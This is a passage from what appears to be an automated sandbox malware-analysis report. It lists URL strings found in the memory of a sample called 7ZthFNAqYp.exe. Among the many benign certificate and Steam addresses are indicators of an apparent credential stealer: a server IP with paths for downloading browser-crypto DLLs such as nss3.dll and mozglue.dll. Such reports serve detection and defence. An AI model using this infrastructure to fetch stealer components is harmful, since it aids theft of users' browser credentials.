Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3402218568.000000002026D000.00000002.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199786602107[1].htm.2.dr String found in binary or memory: https://95.217.220.103
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175941738.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/%
Source: 7ZthFNAqYp.exe, 00000002.00000003.3277338251.000000000114C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215990470.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175887042.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125256711.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262340532.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3277209575.0000000001186000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125794093.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125916467.0000000001195000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/?
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125256711.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125794093.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125916467.0000000001195000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/G
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/a
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/en-GB
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/freebl3.dllO
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/freebl3.dlli
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/mozglue.dll
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/msvcp140.dll
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262340532.000000000114C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/nss3.dll
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/nss3.dll2
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262340532.000000000114C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/nss3.dllc
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/nss3.dlln
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/r
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/softokn3.dll
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/sqlp.dll
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/v
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/vcruntime140.dll
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103/vcruntime140.dllnV
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103AEB
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://95.217.220.103CAA
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: 76561199786602107[1].htm.2.dr String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=Pwd1k_5lFECQ&l=en
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=W9BXs_p_aD4Y&am
